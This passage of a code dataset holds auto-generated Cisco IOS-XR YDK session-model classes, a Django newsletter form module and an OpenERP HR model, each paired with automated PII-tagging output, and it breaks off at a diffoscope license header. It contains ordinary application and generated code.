**type**\: str + + .. attribute:: client_port + + client's port + **type**\: int + + **range:** 0..4294967295 + + .. attribute:: config_session_id + + Config session ID + **type**\: str + + .. attribute:: elapsed_time + + Elapsed time(seconds) since a session is created + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: last_state_change + + Time(seconds) since last session state change happened + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: start_time + + session start time in seconds since the Unix Epoch + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: state + + state of the session idle/busy + **type**\: :py:class:`XrXmlSessionStateEnum ` + + .. attribute:: username + + Username + **type**\: str + + .. attribute:: vrf_name + + VRF name + **type**\: str + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session_id = None + self.admin_config_session_id = None + self.alarm_notification = None + self.client_address = None + self.client_port = None + self.config_session_id = None + self.elapsed_time = None + self.last_state_change = None + self.start_time = None + self.state = None + self.username = None + self.vrf_name = None + + @property + def _common_path(self): + if self.session_id is None: + raise YPYModelError('Key property session_id is None') + + return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session_id is not None: + return True + + if self.admin_config_session_id is not None: + return True + + if self.alarm_notification is not None: + return True + + if self.client_address is not None: + return True + + if self.client_port is not None: + return True + + if self.config_session_id is not None: + return True + + if self.elapsed_time is not None: + return True + + if self.last_state_change is not None: + return True + + if self.start_time is not None: + return True + + if self.state is not None: + return True + + if self.username is not None: + return True + + if self.vrf_name is not None: + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['Netconf.Agent.Tty.Sessions.Session']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session is not None: + for child_ref in self.session: + if child_ref._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['Netconf.Agent.Tty.Sessions']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.sessions is not None and self.sessions._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['Netconf.Agent.Tty']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.tty is not None and self.tty._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['Netconf.Agent']['meta_info'] + + @property + def _common_path(self): + + return '/Cisco-IOS-XR-man-xml-ttyagent-oper:netconf' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.agent is not None and self.agent._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['Netconf']['meta_info'] + + +class XrXml(object): + """""" + xr xml + + .. attribute:: agent + + XML agents + **type**\: :py:class:`Agent ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.agent = XrXml.Agent() + self.agent.parent = self + + + class Agent(object): + """""" + XML agents + + .. attribute:: default + + Default sessions information + **type**\: :py:class:`Default ` + + .. attribute:: ssl + + SSL sessions information + **type**\: :py:class:`Ssl ` + + .. attribute:: tty + + TTY sessions information + **type**\: :py:class:`Tty ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.default = XrXml.Agent.Default() + self.default.parent = self + self.ssl = XrXml.Agent.Ssl() + self.ssl.parent = self + self.tty = XrXml.Agent.Tty() + self.tty.parent = self + + + class Tty(object): + """""" + TTY sessions information + + .. attribute:: sessions + + sessions information + **type**\: :py:class:`Sessions ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.sessions = XrXml.Agent.Tty.Sessions() + self.sessions.parent = self + + + class Sessions(object): + """""" + sessions information + + .. attribute:: session + + xml sessions information + **type**\: list of :py:class:`Session ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session = YList() + self.session.parent = self + self.session.name = 'session' + + + class Session(object): + """""" + xml sessions information + + .. attribute:: session_id + + Session Id + **type**\: int + + **range:** \-2147483648..2147483647 + + .. attribute:: admin_config_session_id + + Admin config session ID + **type**\: str + + .. attribute:: alarm_notification + + is the session registered for alarm notifications + **type**\: :py:class:`XrXmlSessionAlarmRegisterEnum ` + + .. attribute:: client_address + + ip address of the client + **type**\: str + + .. attribute:: client_port + + client's port + **type**\: int + + **range:** 0..4294967295 + + .. attribute:: config_session_id + + Config session ID + **type**\: str + + .. attribute:: elapsed_time + + Elapsed time(seconds) since a session is created + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: last_state_change + + Time(seconds) since last session state change happened + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: start_time + + session start time in seconds since the Unix Epoch + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: state + + state of the session idle/busy + **type**\: :py:class:`XrXmlSessionStateEnum ` + + .. attribute:: username + + Username + **type**\: str + + .. attribute:: vrf_name + + VRF name + **type**\: str + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session_id = None + self.admin_config_session_id = None + self.alarm_notification = None + self.client_address = None + self.client_port = None + self.config_session_id = None + self.elapsed_time = None + self.last_state_change = None + self.start_time = None + self.state = None + self.username = None + self.vrf_name = None + + @property + def _common_path(self): + if self.session_id is None: + raise YPYModelError('Key property session_id is None') + + return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session_id is not None: + return True + + if self.admin_config_session_id is not None: + return True + + if self.alarm_notification is not None: + return True + + if self.client_address is not None: + return True + + if self.client_port is not None: + return True + + if self.config_session_id is not None: + return True + + if self.elapsed_time is not None: + return True + + if self.last_state_change is not None: + return True + + if self.start_time is not None: + return True + + if self.state is not None: + return True + + if self.username is not None: + return True + + if self.vrf_name is not None: + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Tty.Sessions.Session']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session is not None: + for child_ref in self.session: + if child_ref._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Tty.Sessions']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.sessions is not None and self.sessions._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Tty']['meta_info'] + + + class Default(object): + """""" + Default sessions information + + .. attribute:: sessions + + sessions information + **type**\: :py:class:`Sessions ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.sessions = XrXml.Agent.Default.Sessions() + self.sessions.parent = self + + + class Sessions(object): + """""" + sessions information + + .. attribute:: session + + xml sessions information + **type**\: list of :py:class:`Session ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session = YList() + self.session.parent = self + self.session.name = 'session' + + + class Session(object): + """""" + xml sessions information + + .. attribute:: session_id + + Session Id + **type**\: int + + **range:** \-2147483648..2147483647 + + .. attribute:: admin_config_session_id + + Admin config session ID + **type**\: str + + .. attribute:: alarm_notification + + is the session registered for alarm notifications + **type**\: :py:class:`XrXmlSessionAlarmRegisterEnum ` + + .. attribute:: client_address + + ip address of the client + **type**\: str + + .. attribute:: client_port + + client's port + **type**\: int + + **range:** 0..4294967295 + + .. attribute:: config_session_id + + Config session ID + **type**\: str + + .. attribute:: elapsed_time + + Elapsed time(seconds) since a session is created + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: last_state_change + + Time(seconds) since last session state change happened + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: start_time + + session start time in seconds since the Unix Epoch + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: state + + state of the session idle/busy + **type**\: :py:class:`XrXmlSessionStateEnum ` + + .. attribute:: username + + Username + **type**\: str + + .. attribute:: vrf_name + + VRF name + **type**\: str + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session_id = None + self.admin_config_session_id = None + self.alarm_notification = None + self.client_address = None + self.client_port = None + self.config_session_id = None + self.elapsed_time = None + self.last_state_change = None + self.start_time = None + self.state = None + self.username = None + self.vrf_name = None + + @property + def _common_path(self): + if self.session_id is None: + raise YPYModelError('Key property session_id is None') + + return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session_id is not None: + return True + + if self.admin_config_session_id is not None: + return True + + if self.alarm_notification is not None: + return True + + if self.client_address is not None: + return True + + if self.client_port is not None: + return True + + if self.config_session_id is not None: + return True + + if self.elapsed_time is not None: + return True + + if self.last_state_change is not None: + return True + + if self.start_time is not None: + return True + + if self.state is not None: + return True + + if self.username is not None: + return True + + if self.vrf_name is not None: + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Default.Sessions.Session']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session is not None: + for child_ref in self.session: + if child_ref._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Default.Sessions']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.sessions is not None and self.sessions._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Default']['meta_info'] + + + class Ssl(object): + """""" + SSL sessions information + + .. attribute:: sessions + + sessions information + **type**\: :py:class:`Sessions ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.sessions = XrXml.Agent.Ssl.Sessions() + self.sessions.parent = self + + + class Sessions(object): + """""" + sessions information + + .. attribute:: session + + xml sessions information + **type**\: list of :py:class:`Session ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session = YList() + self.session.parent = self + self.session.name = 'session' + + + class Session(object): + """""" + xml sessions information + + .. attribute:: session_id + + Session Id + **type**\: int + + **range:** \-2147483648..2147483647 + + .. attribute:: admin_config_session_id + + Admin config session ID + **type**\: str + + .. attribute:: alarm_notification + + is the session registered for alarm notifications + **type**\: :py:class:`XrXmlSessionAlarmRegisterEnum ` + + .. attribute:: client_address + + ip address of the client + **type**\: str + + .. attribute:: client_port + + client's port + **type**\: int + + **range:** 0..4294967295 + + .. attribute:: config_session_id + + Config session ID + **type**\: str + + .. attribute:: elapsed_time + + Elapsed time(seconds) since a session is created + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: last_state_change + + Time(seconds) since last session state change happened + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: start_time + + session start time in seconds since the Unix Epoch + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: state + + state of the session idle/busy + **type**\: :py:class:`XrXmlSessionStateEnum ` + + .. attribute:: username + + Username + **type**\: str + + .. attribute:: vrf_name + + VRF name + **type**\: str + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session_id = None + self.admin_config_session_id = None + self.alarm_notification = None + self.client_address = None + self.client_port = None + self.config_session_id = None + self.elapsed_time = None + self.last_state_change = None + self.start_time = None + self.state = None + self.username = None + self.vrf_name = None + + @property + def _common_path(self): + if self.session_id is None: + raise YPYModelError('Key property session_id is None') + + return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session_id is not None: + return True + + if self.admin_config_session_id is not None: + return True + + if self.alarm_notification is not None: + return True + + if self.client_address is not None: + return True + + if self.client_port is not None: + return True + + if self.config_session_id is not None: + return True + + if self.elapsed_time is not None: + return True + + if self.last_state_change is not None: + return True + + if self.start_time is not None: + return True + + if self.state is not None: + return True + + if self.username is not None: + return True + + if self.vrf_name is not None: + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Ssl.Sessions.Session']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session is not None: + for child_ref in self.session: + if child_ref._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Ssl.Sessions']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.sessions is not None and self.sessions._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Ssl']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.default is not None and self.default._has_data(): + return True + + if self.ssl is not None and self.ssl._has_data(): + return True + + if self.tty is not None and self.tty._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent']['meta_info'] + + @property + def _common_path(self): + + return '/Cisco-IOS-XR-man-xml-ttyagent-oper:xr-xml' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.agent is not None and self.agent._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml']['meta_info'] + + +",41298,"[['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['PERSON', 'Enum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['PERSON', ""Agent']['meta_info""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['PERSON', ""Agent']['meta_info""], ['IP_ADDRESS', ' '], ['IP_ADDRESS', 'e:: '], ['URL', 'ydk.er'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Ag'], ['URL', 'self.ag'], ['URL', 'Netconf.Ag'], ['URL', 'self.agent.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tt'], ['URL', 'self.pa'], ['URL', 'self.tt'], ['URL', 'Netconf.Agent.Tt'], ['URL', 'self.tty.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tty.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'Netconf.Agent.Tty.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tty.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tty.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tty.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tt'], ['URL', 'self.tt'], ['URL', 'self.tt'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Ag'], ['URL', 'self.ag'], ['URL', 'self.ag'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Ag'], ['URL', 'self.ag'], ['URL', 'XrXml.Ag'], ['URL', 'self.agent.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.De'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Ag'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tt'], ['URL', 'self.pa'], ['URL', 'self.de'], ['URL', 'XrXml.Agent.De'], ['URL', 'self.default.pa'], ['URL', 'XrXml.Ag'], ['URL', 'self.ssl.pa'], ['URL', 'self.tt'], ['URL', 'XrXml.Agent.Tt'], ['URL', 'self.tty.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tty.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Tty.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tty.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tty.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tty.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tt'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Default.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Default.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Default.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Default.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Default.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.De'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Ssl.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Ssl.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Ssl.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Ssl.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Ssl.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Ag'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.tt'], ['URL', 'self.tt'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Ag'], ['URL', 'self.ag'], ['URL', 'self.ag'], ['URL', 'ydk.models.ci']]" +104,"__author__ = 'Viktor Kerkez dummy@email.com' +__contact__ = dummy@email.com' +__date__ = '20 April 2010' +__copyright__ = 'Copyright (c) 2010 Viktor Kerkez' + +import logging +from django import forms +from django.conf import settings +from google.appengine.api import mail + +# perart imports +from perart import models + +class PerArtForm(forms.ModelForm): + tinymce = True + +class ProgramForm(PerArtForm): + class Meta: + model = models.Program + exclude = ['url'] + + +class ProjectForm(PerArtForm): + class Meta: + model = models.Project + exclude = ['url'] + + +class NewsForm(PerArtForm): + class Meta: + model = models.News + exclude = ['url'] + + +class MenuForm(PerArtForm): + tinymce = False + + class Meta: + model = models.Menu + exclude = ['url'] + + +class GalleryForm(PerArtForm): + class Meta: + model = models.Gallery + exclude = ['url'] + + +class NewsletterForm(forms.Form): + name = forms.CharField(required=True) + email = forms.EmailField(required=True) + + def send_email(self): + try: + mail.send_mail(dummy@email.com', + to=settings.PERART_EMAIL, + subject='""%(name)s"" se prijavio za newsletter' % self.cleaned_data, + body='Ime: %(name)s\nEmail: %(email)s' % self.cleaned_data) + return True + except: + logging.exception('sending message failed') + return False + ",1485,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Viktor Kerkez'], ['DATE_TIME', ""'20 April 2010'""], ['DATE_TIME', '2010'], ['PERSON', 'Viktor Kerkez'], ['URL', 'forms.Fo'], ['PERSON', 'PERART_EMAIL'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'django.co'], ['URL', 'forms.Mo'], ['URL', 'models.Pro'], ['URL', 'models.Pro'], ['URL', 'models.Ne'], ['URL', 'models.Me'], ['URL', 'models.Ga'], ['URL', 'forms.Ch'], ['URL', 'mail.se'], ['URL', 'email.com'], ['URL', 'settings.PE'], ['URL', 'self.cl'], ['URL', 'self.cl']]" +105,"#!/usr/bin/python +# -*- coding: utf-8 -*- +############################################################################## +# +# Pedro Arroyo M dummy@email.com +# Copyright (C) 2015 Mall Connection(). +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as +# published by the Free Software Foundation, either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. +# +# You should have received a copy of the GNU Affero General Public License +# along with this program. If not, see . +# +############################################################################## + + +from osv import osv +from osv import fields + +class hr_family_responsibilities(osv.osv): + ''' + Open ERP Model + ''' + _name = 'hr.family.responsibilities' + _description = 'openerpmodel' + + _columns = { + 'name':fields.char('Name', size=64, required=True, readonly=False), + 'type':fields.selection([ + ('simple','simple responsibility'), + ('maternal','maternal responsibility'), + ('invalid','invalid responsibility'), + ], 'State', select=True), + 'relationship':fields.selection([ + ('father','father'), + ('son','son / daughter'), + ('spouse','spouse'), + ('Father in law','Father in law / mother in law'), + ('son','son / daughter'), + ('second','second'), + ('Grandfather','Grandfather / Grandmother'), + ('grandchild','grandchild / granddaughter'), + ('sister','sister / brother'), + ('brother in law','brother in law / sister in law'), + ], 'Relationship', select=True, readonly=False), + 'vat': fields.char('TIN', size=32, help=""Tax Identification Number. Check the box if this contact is subjected to taxes. Used by the some of the legal statements.""), + 'employee_id': fields.many2one('hr.employee', string='Employee'), + + } +hr_family_responsibilities()",2456,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015'], ['PERSON', ""law','Father""], ['PERSON', ""Grandfather','Grandfather""], ['URL', 'http://www.mallconnection.org'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'hr.family.re'], ['URL', 'fields.ch'], ['URL', 'fields.se'], ['URL', 'fields.se'], ['URL', 'fields.ch'], ['URL', 'fields.ma']]" +106,"# -*- coding: utf-8 -*- +# +# diffoscope: in-depth comparison of files, archives, and directories +# +# Copyright © 2018 Chris Lamb dummy@email.com +# +# diffoscope is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later 